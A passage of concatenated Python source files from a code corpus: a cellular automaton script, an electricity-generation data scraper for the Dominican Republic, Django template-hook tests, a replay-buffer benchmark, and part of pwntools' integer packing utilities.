filename='foo', header_row=1, encoder=CustomEncoder())
generated_data = [next(gen) for _ in range(row_count)]
for _count, record in generated_data:
self.assertEqual(len(record), col_count)
self.assertEqual(generated_data[0][0], 1)
self.assertEqual(generated_data[99][0], 100)
|
the-stack_0_12382 | # Author:
# Adapted from code in Think Complexity, 2nd Edition, by Allen Downey
import sys
import numpy as np
rule_width = 7
def make_table(rule_num):
"""Make the table for a given CA rule.
rule: int 0-2186
returns: array of 7 0s, 1s, and 2s
"""
rule_set = [0] * rule_width
num = rule_num
for i in range(rule_width):
rule_set[i] = num % 3
num = num // 3
rule_set.reverse()
print("number: ", rule_num)
print("rule_set:", rule_set)
return rule_set
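# For example, make_table(1635) returns [2, 0, 2, 0, 1, 2, 0]: the base-3 digits of 1635,
# read as the next cell state for neighborhood sums 6 down to 0.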
class TotalisticCell1D:
"""Represents a 1-D, three-state, totalistic cellular automaton"""
def __init__(self, rule_num, gen_count, m=None):
"""Initializes the CA.
rule: integer
n: number of rows
m: number of columns
Attributes:
table: rule dictionary that maps from triple to next state.
array: the numpy array that contains the data.
next: the index of the next empty row.
"""
self.rule_width = 7
self.table = make_table(rule_num)
self.n = gen_count
self.width = 2 * gen_count + 1 if m is None else m
self.array = np.zeros((gen_count, self.width), dtype=np.int8)
self.next = 0
def start_single(self):
"""Starts with one cell in the middle of the top row."""
self.array[0, self.width // 2] = 1
self.next += 1
def start_random(self):
"""Start with random values in the top row."""
self.array[0] = np.random.random(self.width).round()
self.next += 1
def start_string(self, s):
"""Start with values from a string of 1s and 0s."""
s_len = len(s)
# Check string length
assert s_len <= self.width
padding_len = self.width - s_len
left_padding_len = padding_len // 2
ss = "0" * left_padding_len + s
right_padding_len = self.width - len(ss)
sss = ss + "0" * right_padding_len
self.array[0] = np.array([int(x) for x in sss])
self.next += 1
def loop(self, steps=1):
"""Executes the given number of time steps."""
for i in range(steps):
if i % 1024 == 0:
print("step {} of {}".format(i, self.n))
self.step()
def step(self):
"""Executes one time step by computing the next row of the array."""
a = self.array
i = self.next
window = [1, 1, 1]
row = self.array[i - 1]
correlated_row = np.correlate(row, window, mode="same")
next_row = np.array([self.table[7 - total - 1] for total in correlated_row])
a[i] = next_row
self.next += 1
def print_ca(self, start=0, end=None, fid=None):
"""Prints the CA.
start: index of the first column to be shown
end: index of the last column to be shown
"""
a = self.array[:, start:end]
if fid:
np.savetxt(fid, a, delimiter="", fmt='%1d', )
else:
for row in a:
print(row)
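# Typical use of the class (mirrored by draw_ca below):
#   ca = TotalisticCell1D(rule_num=1635, gen_count=16)
#   ca.start_single()
#   ca.loop(steps=15)
#   ca.print_ca()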
def draw_ca(rule_num, gen_count=32, fid=None, start=None):
"""Makes and prints a 1D, three-state, totalistic CA with a given rule.
    rule_num: int rule number
    gen_count: int number of rows (generations)
"""
ca = TotalisticCell1D(rule_num, gen_count)
if start is None:
ca.start_single()
else:
ca.start_string(start)
ca.loop(gen_count - 1)
ca.print_ca(fid=fid)
def write_ca(gen_count=16, start=None):
rule_num = 1635
if start is None:
file_name = "out/ca/{}_{:05d}.txt".format(rule_num, gen_count)
else:
file_name = "out/ca/{}_{:05d}_{}.txt".format(rule_num, gen_count, start)
fid = file_name
draw_ca(rule_num, gen_count, fid, start)
if __name__ == "__main__":
n = int(sys.argv[1])
if len(sys.argv) > 2:
seed = sys.argv[2]
write_ca(n, seed)
else:
write_ca(n)
|
the-stack_0_12383 | #!/usr/bin/env python3
import arrow
from bs4 import BeautifulSoup
from collections import defaultdict
import logging
from math import isnan
import numpy as np
from operator import itemgetter
import pandas as pd
import requests
# This parser gets hourly electricity generation data from oc.org.do for the Dominican Republic.
# The data is in MWh but since it is updated hourly we can view it as MW.
# Solar generation now has some data available but multiple projects are planned/under construction.
url = 'http://190.122.102.21:8084/reportesgraficos/reportepostdespacho.aspx'
total_mapping = {
u'Total T\xe9rmico': 'Thermal',
u'Total E\xf3lico': 'Wind',
u'Total Hidroel\xe9ctrica': 'Hydro',
u'Total Solar': 'Solar',
u'Total Generado': 'Generated'
}
# Power plant types
# http://www.sie.gob.do/images/Estadisticas/MEM/GeneracionDiariaEnero2017/
# Reporte_diario_de_generacion_31_enero_2017_merged2.pdf
thermal_plants = {
u'AES ANDRES': 'gas',
u'BARAHONA CARBON': 'coal',
u'BERSAL': 'oil',
u'CEPP 1': 'oil',
u'CEPP 2': 'oil',
u'CESPM 1': 'oil',
u'CESPM 2': 'oil',
u'CESPM 3': 'oil',
u'ESTRELLA DEL MAR 2 CFO': 'oil',
u'ESTRELLA DEL MAR 2 CGN': 'gas',
u'ESTRELLA DEL MAR 2 SFO': 'oil',
u'ESTRELLA DEL MAR 2 SGN': 'gas',
u'GENERACI\xD3N DE EMERGENCIA AES ANDR\xC9S': 'gas',
u'HAINA TG': 'oil',
u'INCA KM22': 'oil',
u'ITABO 1': 'coal',
u'ITABO 2': 'coal',
u'LA VEGA': 'oil',
u'LOS MINA 5': 'gas',
u'LOS MINA 6': 'gas',
u'LOS MINA 7': 'gas',
u'LOS OR\xcdGENES POWER PLANT FUEL OIL': 'oil',
u'LOS OR\xcdGENES POWER PLANT GAS NATURAL': 'gas',
u'METALDOM': 'oil',
u'MONTE RIO': 'oil',
u'PALAMARA': 'oil',
u'PALENQUE': 'oil',
u'PARQUE ENERGETICO LOS MINA CC PARCIAL': 'gas',
u'PARQUE ENERGETICO LOS MINA CC TOTAL': 'gas',
u'PIMENTEL 1': 'oil',
u'PIMENTEL 2': 'oil',
u'PIMENTEL 3': 'oil',
u'PUNTA CATALINA 1': 'coal',
u'PUNTA CATALINA 2': 'coal',
u'QUISQUEYA 1': 'gas',
u'QUISQUEYA 2': 'gas',
u'QUISQUEYA 1 SAN PEDRO': 'oil',
u'RIO SAN JUAN': 'oil',
u'SAN FELIPE': 'oil',
u'SAN FELIPE CC': 'gas',
u'SAN FELIPE VAP': 'oil',
u'SAN LORENZO 1': 'gas',
u'SAN PEDRO BIO-ENERGY': 'biomass',
u'SAN PEDRO VAPOR': 'oil',
u'SULTANA DEL ESTE': 'oil'
}
def get_data(session=None):
"""
Makes a request to source url.
Finds main table and creates a list of all table elements in string format.
Returns a list.
"""
data = []
s = session or requests.Session()
data_req = s.get(url)
soup = BeautifulSoup(data_req.content, 'lxml')
tbs = soup.find("table", id="PostdespachoUnidadesTermicasGrid_DXMainTable")
rows = tbs.find_all("td")
for row in rows:
num = row.getText().strip()
data.append(str(num))
return data
def floater(item):
"""
Attempts to convert any item given to a float. Returns item if it fails.
"""
try:
return float(item)
except ValueError:
return item
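# e.g. floater('72.4') -> 72.4, while non-numeric strings such as '' are returned unchanged.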
def chunker(big_lst):
"""
Breaks a big list into a list of lists. Removes any list with no data then turns remaining
lists into key: value pairs with first element from the list being the key.
Returns a dictionary.
"""
chunks = [big_lst[x:x + 27] for x in range(0, len(big_lst), 27)]
# Remove the list if it contains no data.
for chunk in chunks:
if any(chunk):
continue
else:
chunks.remove(chunk)
chunked_list = {words[0]: words[1:] for words in chunks}
return chunked_list
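# Each 27-element chunk holds one unit's name followed by its 26 readings, e.g.
# chunker(['PLANT A', 1.0, ..., 26.0]) -> {'PLANT A': [1.0, ..., 26.0]} ('PLANT A' is illustrative).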
def data_formatter(data):
"""
Takes data and finds relevant sections. Formats and breaks data into usable parts.
Returns a nested dictionary.
"""
find_thermal_index = data.index(u'GRUPO: T\xe9rmica')
find_totals_index = data.index(u'Total T\xe9rmico')
find_totals_end = data.index(u'Total Programado')
ufthermal = data[find_thermal_index + 3:find_totals_index - 59]
total_data = data[find_totals_index:find_totals_end]
# Remove all company names.
for val in ufthermal:
if ':' in val:
i = ufthermal.index(val)
del ufthermal[i:i + 3]
formatted_thermal = chunker([floater(item) for item in ufthermal])
mapped_totals = [total_mapping.get(x, x) for x in total_data]
formatted_totals = chunker([floater(item) for item in mapped_totals])
return {'totals': formatted_totals, 'thermal': formatted_thermal}
def data_parser(formatted_data):
"""
Converts formatted data into a pandas dataframe. Removes any empty rows.
Returns a DataFrame.
"""
hours = list(range(1, 24)) + [0] + [25, 26]
dft = pd.DataFrame(formatted_data, index=hours)
dft = dft.drop(dft.index[[-1, -2]])
dft = dft.replace(u'', np.nan)
dft = dft.dropna(how='all')
return dft
def thermal_production(df, logger):
"""
Takes DataFrame and finds thermal generation for each hour.
Removes any non generating plants then maps plants to type.
Sums type instances and returns a dictionary.
"""
therms = []
unmapped = set()
for hour in df.index.values:
dt = hour
currentt = df.loc[[hour]]
# Create current plant output.
tp = {}
for item in list(df):
v = currentt.iloc[0][item]
tp[item] = v
current_plants = {k: tp[k] for k in tp if not isnan(tp[k])}
for plant in current_plants.keys():
if plant not in thermal_plants.keys():
unmapped.add(plant)
mapped_plants = [(thermal_plants.get(plant, 'unknown'), val) for plant, val in current_plants.items()]
thermalDict = defaultdict(lambda: 0.0)
# Sum values for duplicate keys.
for key, val in mapped_plants:
thermalDict[key] += val
thermalDict['datetime'] = dt
thermalDict = dict(thermalDict)
therms.append(thermalDict)
for plant in unmapped:
logger.warning(
'{} is missing from the DO plant mapping!'.format(plant),
extra={'key': 'DO'})
return therms
def total_production(df):
"""
Takes DataFrame and finds generation totals for each hour.
Returns a dictionary.
"""
vals = []
# The Dominican Republic does not observe daylight savings time.
for hour in df.index.values:
dt = hour
current = df.loc[[hour]]
hydro = current.iloc[0]['Hydro']
wind = current.iloc[0]['Wind']
solar = current.iloc[0]['Solar']
if wind > -10:
wind = max(wind, 0)
# Wind and hydro totals do not always update exactly on the new hour.
# In this case we set them to None because they are unknown rather than zero.
if isnan(wind):
wind = None
if isnan(hydro):
hydro = None
prod = {'wind': wind, 'hydro': hydro, 'solar': solar, 'datetime': dt}
vals.append(prod)
return vals
def merge_production(thermal, total):
"""
Takes thermal generation and total generation and merges them using 'datetime' key.
Returns a defaultdict.
"""
d = defaultdict(dict)
for each in (thermal, total):
for elem in each:
d[elem['datetime']].update(elem)
final = sorted(d.values(), key=itemgetter("datetime"))
def get_datetime(hour):
        at = arrow.now('America/Santo_Domingo').floor('day')
dt = (at.shift(hours=int(hour) - 1)).datetime
return dt
for item in final:
i = item['datetime']
j = get_datetime(i)
item['datetime'] = j
return final
def fetch_production(zone_key='DO', session=None, target_datetime=None, logger=logging.getLogger(__name__)):
"""
Requests the last known production mix (in MW) of a given country
Arguments:
zone_key (optional) -- used in case a parser is able to fetch multiple countries
Return:
A dictionary in the form:
{
'zoneKey': 'FR',
'datetime': '2017-01-01T00:00:00Z',
'production': {
'biomass': 0.0,
'coal': 0.0,
'gas': 0.0,
'hydro': 0.0,
'nuclear': null,
'oil': 0.0,
'solar': 0.0,
'wind': 0.0,
'geothermal': 0.0,
'unknown': 0.0
},
'storage': {
'hydro': -10.0,
},
'source': 'mysource.com'
}
"""
if target_datetime:
raise NotImplementedError('This parser is not yet able to parse past dates')
    dat = data_formatter(get_data(session=session))
tot = data_parser(dat['totals'])
th = data_parser(dat['thermal'])
thermal = thermal_production(th, logger)
total = total_production(tot)
merge = merge_production(thermal, total)
production_mix_by_hour = []
for hour in merge:
production_mix = {
'zoneKey': zone_key,
'datetime': hour['datetime'],
'production': {
'biomass': hour.get('biomass', 0.0),
'coal': hour.get('coal', 0.0),
'gas': hour.get('gas', 0.0),
'hydro': hour.get('hydro', 0.0),
'nuclear': 0.0,
'oil': hour.get('oil', 0.0),
'solar': hour.get('solar', 0.0),
'wind': hour.get('wind', 0.0),
'geothermal': 0.0,
'unknown': hour.get('unknown', 0.0)
},
'storage': {
'hydro': None,
},
'source': 'oc.org.do'
}
production_mix_by_hour.append(production_mix)
return production_mix_by_hour
if __name__ == '__main__':
"""Main method, never used by the Electricity Map backend, but handy for testing."""
print('fetch_production() ->')
print(fetch_production())
|
the-stack_0_12388 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from django.template import Template, Context
from django.utils.html import mark_safe
from hooks.templatehook import hook
from hooks.templatetags.hooks_tags import template_hook_collect
from . import utils_hooks
class HookTagTest(TestCase):
def setUp(self):
self.hook_name = 'myhook'
hook.unregister_all(self.hook_name)
utils_hooks.myhook.unregister_all()
def test_hook_tag(self):
def func(context, *args, **kwargs):
self.assertEqual(args, ("foobar", ))
self.assertEqual(kwargs, {'bar': "bar", })
self.assertEqual(context['foo'], "foo")
return "hello"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' bar='bar' %}"
).render(Context({"hook_name": self.hook_name, "foo": "foo", }))
self.assertEqual(out, u"hello")
def test_hook_tag_many(self):
"""
Should join multiple responses
"""
def func_a(*args, **kwargs):
return "hello"
def func_b(*args, **kwargs):
return "goodbye"
hook.register(self.hook_name, func_a)
hook.register(self.hook_name, func_b)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "hello\ngoodbye")
def test_hook_tag_escaped(self):
"""
Should escape responses (if they are not marked as safe)
"""
def func(*args, **kwargs):
return "<span>hello</span>"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
        self.assertEqual(out, "&lt;span&gt;hello&lt;/span&gt;")
def test_hook_tag_mark_safe(self):
"""
Should not escape safe strings
"""
def func(*args, **kwargs):
return mark_safe("<span>hello</span>")
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "<span>hello</span>")
def test_template_hook_collect(self):
def func(context, *args, **kwargs):
self.assertEqual(context, "context")
self.assertEqual(args, ("foo", ))
self.assertEqual(kwargs, {'extra': "bar", })
return "hello"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
self.assertEqual(res, u"hello")
res = template_hook_collect(utils_hooks, 'badhook')
self.assertEqual(res, u"")
def test_template_hook_collect_escaped(self):
def func(*args, **kwargs):
return "<span>hello</span>"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
        self.assertEqual(res, "&lt;span&gt;hello&lt;/span&gt;")
|
the-stack_0_12389 | import os
import sys
from time import time as timer
import gym
import torch
import numpy as np
import numpy.random as rd
'''
2020-0505 ZenJiaHao Github: YonV1943
Compare the running speed of different ReplayBuffer(Memory) implement.
ReplayBuffer UsedTime(s) Storage(memories)
MemoryList: 24 list()
MemoryTuple: 20 collections.namedtuple
MemoryArray: 13 numpy.array
MemoryTensor: 13 torch.tensor (GPU/CPU)
'''
class BufferList:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = len(self.memories)
def add_memo(self, memory_tuple):
self.memories.append(memory_tuple)
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
'''convert list into array'''
arrays = [list()
for _ in range(5)] # len(self.memories[0]) == 5
for index in indices:
items = self.memories[index]
for item, array in zip(items, arrays):
array.append(item)
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferTuple:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = None # init in init_after_add_memo()
from collections import namedtuple
self.transition = namedtuple(
'Transition', ('reward', 'mask', 'state', 'action', 'next_state',)
)
def add_memo(self, args):
self.memories.append(self.transition(*args))
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
'''convert tuple into array'''
arrays = self.transition(*zip(*[self.memories[i] for i in indices]))
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferArray: # 2020-05-20
def __init__(self, memo_max_len, state_dim, action_dim, ):
memo_dim = 1 + 1 + state_dim + action_dim + state_dim
self.memories = np.empty((memo_max_len, memo_dim), dtype=np.float32)
self.next_idx = 0
self.is_full = False
self.max_len = memo_max_len
self.now_len = self.max_len if self.is_full else self.next_idx
self.state_idx = 1 + 1 + state_dim # reward_dim==1, done_dim==1
self.action_idx = self.state_idx + action_dim
def add_memo(self, memo_tuple):
self.memories[self.next_idx] = np.hstack(memo_tuple)
self.next_idx = self.next_idx + 1
if self.next_idx >= self.max_len:
self.is_full = True
self.next_idx = 0
def init_after_add_memo(self):
self.now_len = self.max_len if self.is_full else self.next_idx
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
memory = self.memories[indices]
memory = torch.tensor(memory, device=device)
'''convert array into torch.tensor'''
tensors = (
memory[:, 0:1], # rewards
memory[:, 1:2], # masks, mark == (1-float(done)) * gamma
memory[:, 2:self.state_idx], # states
memory[:, self.state_idx:self.action_idx], # actions
memory[:, self.action_idx:], # next_states
)
return tensors
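# Minimal usage sketch (hypothetical dimensions), matching the pattern used in
# uniform_exploration() and run_compare_speed_of_replay_buffer() below:
#   memo = BufferArray(memo_max_len=2 ** 12, state_dim=4, action_dim=2)
#   memo.add_memo((reward, mask, state, action, next_state))
#   memo.init_after_add_memo()
#   batch = memo.random_sample(batch_size=64, device=torch.device('cpu'))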
def uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim):
state = env.reset()
rewards = list()
reward_sum = 0.0
steps = list()
step = 0
global_step = 0
while global_step < max_step:
# action = np.tanh(rd.normal(0, 0.5, size=action_dim)) # zero-mean gauss exploration
action = rd.uniform(-1.0, +1.0, size=action_dim) # uniform exploration
next_state, reward, done, _ = env.step(action * max_action)
reward_sum += reward
step += 1
adjust_reward = reward * reward_scale
mask = 0.0 if done else gamma
memo.add_memo((adjust_reward, mask, state, action, next_state))
state = next_state
if done:
rewards.append(reward_sum)
steps.append(step)
global_step += step
state = env.reset() # reset the environment
reward_sum = 0.0
step = 1
memo.init_after_add_memo()
return rewards, steps
def run_compare_speed_of_replay_buffer():
from AgentRun import get_env_info
os.environ['CUDA_VISIBLE_DEVICES'] = '3' # sys.argv[-1][-4]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
batch_size = 2 ** 8
max_step = 2 ** 10
gamma = 0.99
reward_scale = 1
memo_max_len = 2 ** 13
start_time = timer()
for env_name in ("LunarLanderContinuous-v2", "BipedalWalker-v3"):
env = gym.make(env_name)
state_dim, action_dim, max_action, target_reward = get_env_info(env)
        # memo = BufferList(memo_max_len)
        # memo = BufferTuple(memo_max_len)
memo = BufferArray(memo_max_len, state_dim, action_dim)
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for i in range(8):
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for _ in range(max_step):
batches = memo.random_sample(batch_size, device)
for batch in batches:
assert torch.is_tensor(batch)
print("Used Time: {:.1f}".format(timer() - start_time))
if __name__ == '__main__':
run_compare_speed_of_replay_buffer()
|
the-stack_0_12390 | # -*- coding: utf-8 -*-
r"""
Module for packing and unpacking integers.
Simplifies access to the standard ``struct.pack`` and ``struct.unpack``
functions, and also adds support for packing/unpacking arbitrary-width
integers.
The packers are all context-aware for ``endian`` and ``signed`` arguments,
though they can be overridden in the parameters.
Examples:
>>> p8(0)
b'\x00'
>>> p32(0xdeadbeef)
b'\xef\xbe\xad\xde'
>>> p32(0xdeadbeef, endian='big')
b'\xde\xad\xbe\xef'
>>> with context.local(endian='big'): p32(0xdeadbeef)
b'\xde\xad\xbe\xef'
Make a frozen packer, which does not change with context.
>>> p=make_packer('all')
>>> p(0xff)
b'\xff'
>>> p(0x1ff)
b'\xff\x01'
>>> with context.local(endian='big'): print(repr(p(0x1ff)))
b'\xff\x01'
"""
from __future__ import absolute_import
from __future__ import division
import collections
import six
import struct
import sys
from six.moves import range
from pwnlib.context import LocalNoarchContext
from pwnlib.context import context
from pwnlib.log import getLogger
from pwnlib.util import iters
mod = sys.modules[__name__]
log = getLogger(__name__)
def pack(number, word_size = None, endianness = None, sign = None, **kwargs):
"""pack(number, word_size = None, endianness = None, sign = None, **kwargs) -> str
    Packs an arbitrary-sized integer.
    Word size, endianness and signedness are taken from context unless overridden.
`word_size` can be any positive number or the string "all". Choosing the
string "all" will output a string long enough to contain all the significant
bits and thus be decodable by :func:`unpack`.
`word_size` can be any positive number. The output will contain word_size/8
rounded up number of bytes. If word_size is not a multiple of 8, it will be
padded with zeroes up to a byte boundary.
Arguments:
number (int): Number to convert
word_size (int): Word size of the converted integer or the string 'all' (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The packed number as a string.
Examples:
>>> pack(0x414243, 24, 'big', True)
b'ABC'
>>> pack(0x414243, 24, 'little', True)
b'CBA'
>>> pack(0x814243, 24, 'big', False)
b'\\x81BC'
>>> pack(0x814243, 24, 'big', True)
Traceback (most recent call last):
...
ValueError: pack(): number does not fit within word_size
>>> pack(0x814243, 25, 'big', True)
b'\\x00\\x81BC'
>>> pack(-1, 'all', 'little', True)
b'\\xff'
>>> pack(-256, 'all', 'big', True)
b'\\xff\\x00'
>>> pack(0x0102030405, 'all', 'little', True)
b'\\x05\\x04\\x03\\x02\\x01'
>>> pack(-1)
b'\\xff\\xff\\xff\\xff'
>>> pack(0x80000000, 'all', 'big', True)
b'\\x00\\x80\\x00\\x00\\x00'
"""
if sign is None and number < 0:
sign = True
if word_size != 'all':
kwargs.setdefault('word_size', word_size)
kwargs.setdefault('endianness', endianness)
kwargs.setdefault('sign', sign)
with context.local(**kwargs):
# Lookup in context if not found
word_size = 'all' if word_size == 'all' else context.word_size
endianness = context.endianness
sign = context.sign
if not isinstance(number, six.integer_types):
raise ValueError("pack(): number must be of type (int,long) (got %r)" % type(number))
if not isinstance(sign, bool):
raise ValueError("pack(): sign must be either True or False (got %r)" % sign)
if endianness not in ['little', 'big']:
raise ValueError("pack(): endianness must be either 'little' or 'big' (got %r)" % endianness)
# Verify that word_size make sense
if word_size == 'all':
if number == 0:
word_size = 8
elif number > 0:
if sign:
word_size = (number.bit_length() | 7) + 1
else:
word_size = ((number.bit_length() - 1) | 7) + 1
else:
if not sign:
raise ValueError("pack(): number does not fit within word_size")
word_size = ((number + 1).bit_length() | 7) + 1
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("pack(): word_size must be a positive integer or the string 'all'")
if sign:
limit = 1 << (word_size-1)
if not -limit <= number < limit:
raise ValueError("pack(): number does not fit within word_size")
else:
limit = 1 << word_size
if not 0 <= number < limit:
raise ValueError("pack(): number does not fit within word_size [%i, %r, %r]" % (0, number, limit))
# Normalize number and size now that we have verified them
# From now on we can treat positive and negative numbers the same
number = number & ((1 << word_size) - 1)
byte_size = (word_size + 7) // 8
out = []
for _ in range(byte_size):
out.append(_p8lu(number & 0xff))
number = number >> 8
if endianness == 'little':
return b''.join(out)
else:
return b''.join(reversed(out))
@LocalNoarchContext
def unpack(data, word_size = None):
"""unpack(data, word_size = None, endianness = None, sign = None, **kwargs) -> int
    Unpacks an arbitrary-sized integer.
    Word size, endianness and signedness are taken from context unless overridden.
`word_size` can be any positive number or the string "all". Choosing the
string "all" is equivalent to ``len(data)*8``.
If `word_size` is not a multiple of 8, then the bits used for padding
are discarded.
Arguments:
number (int): String to convert
word_size (int): Word size of the converted integer or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked number.
Examples:
>>> hex(unpack(b'\\xaa\\x55', 16, endian='little', sign=False))
'0x55aa'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=False))
'0xaa55'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=True))
'-0x55ab'
>>> hex(unpack(b'\\xaa\\x55', 15, endian='big', sign=True))
'0x2a55'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='little', sign=True))
'0x302ff'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='big', sign=True))
'-0xfdfd'
"""
# Lookup in context if not found
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
# Verify that word_size make sense
if word_size == 'all':
word_size = len(data) * 8
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("unpack(): word_size must be a positive integer or the string 'all'")
byte_size = (word_size + 7) // 8
if byte_size != len(data):
raise ValueError("unpack(): data must have length %d, since word_size was %d" % (byte_size, word_size))
number = 0
if endianness == "little":
data = reversed(data)
data = bytearray(data)
for c in data:
number = (number << 8) + c
number = number & ((1 << word_size) - 1)
if not sign:
return int(number)
signbit = number & (1 << (word_size-1))
return int(number - 2*signbit)
@LocalNoarchContext
def unpack_many(data, word_size = None):
"""unpack(data, word_size = None, endianness = None, sign = None) -> int list
Splits `data` into groups of ``word_size//8`` bytes and calls :func:`unpack` on each group. Returns a list of the results.
`word_size` must be a multiple of `8` or the string "all". In the latter case a singleton list will always be returned.
Args
number (int): String to convert
word_size (int): Word size of the converted integers or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked numbers.
Examples:
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='little', sign=False)))
['0x55aa', '0x33cc']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=False)))
['0xaa55', '0xcc33']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=True)))
['-0x55ab', '-0x33cd']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='little', sign=True)))
['0x302ff']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='big', sign=True)))
['-0xfdfd']
"""
# Lookup in context if None
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size == 'all':
return [unpack(data, word_size)]
# Currently we only group on byte boundaries
if word_size % 8 != 0:
raise ValueError("unpack_many(): word_size must be a multiple of 8")
out = []
n = word_size // 8
for i in range(0, len(data), n):
out.append(unpack(data[i:i+n], word_size))
return list(map(int, out))
#
# Make individual packers, e.g. _p8lu
#
ops = {'p': struct.pack, 'u': lambda *a: struct.unpack(*(
x.encode('latin1') if not hasattr(x, 'decode') else x
for x in a))[0]}
sizes = {8:'b', 16:'h', 32:'i', 64:'q'}
ends = ['b','l']
signs = ['s','u']
def make_single(op,size,end,sign):
name = '_%s%s%s%s' % (op, size, end, sign)
fmt = sizes[size]
end = '>' if end == 'b' else '<'
if sign == 'u':
fmt = fmt.upper()
fmt = end+fmt
def routine(data):
return ops[op](fmt,data)
routine.__name__ = routine.__qualname__ = name
return name, routine
for op,size,end,sign in iters.product(ops, sizes, ends, signs):
name, routine = make_single(op,size,end,sign)
setattr(mod, name, routine)
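# The loop above attaches the specialised helpers to this module, e.g. _p32lu
# (pack 32-bit little-endian unsigned) and _u16bs (unpack 16-bit big-endian signed).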
return_types = {'p': 'str', 'u': 'int'}
op_verbs = {'p': 'pack', 'u': 'unpack'}
arg_doc = {'p': 'number (int): Number to convert',
'u': 'data (str): String to convert'}
rv_doc = {'p': 'The packed number as a string',
'u': 'The unpacked number'}
#
# Make normal user-oriented packers, e.g. p8
#
def make_multi(op, size):
name = "%s%s" % (op,size)
ls = getattr(mod, "_%sls" % (name))
lu = getattr(mod, "_%slu" % (name))
bs = getattr(mod, "_%sbs" % (name))
bu = getattr(mod, "_%sbu" % (name))
@LocalNoarchContext
def routine(number):
endian = context.endian
signed = context.signed
return {("little", True ): ls,
("little", False): lu,
("big", True ): bs,
("big", False): bu}[endian, signed](number)
routine.__name__ = name
routine.__doc__ = """%s%s(number, sign, endian, ...) -> %s
%ss an %s-bit integer
Arguments:
%s
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer ("unsigned"/"signed")
kwargs (dict): Arguments passed to context.local(), such as
``endian`` or ``signed``.
Returns:
%s
""" % (op, size, return_types[op], op_verbs[op].title(), size, arg_doc[op], rv_doc[op])
return name, routine
for op,size in iters.product(ops, sizes):
name, routine = make_multi(op,size)
setattr(mod, name, routine)
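# Similarly, this loop defines the context-aware public helpers p8/p16/p32/p64 and
# u8/u16/u32/u64, which dispatch on context.endian and context.signed at call time.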
def make_packer(word_size = None, sign = None, **kwargs):
"""make_packer(word_size = None, endianness = None, sign = None) -> number → str
Creates a packer by "freezing" the given arguments.
Semantically calling ``make_packer(w, e, s)(data)`` is equivalent to calling
``pack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer or the string all (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signness to be baked into the returned packer. ("unsigned"/"signed")
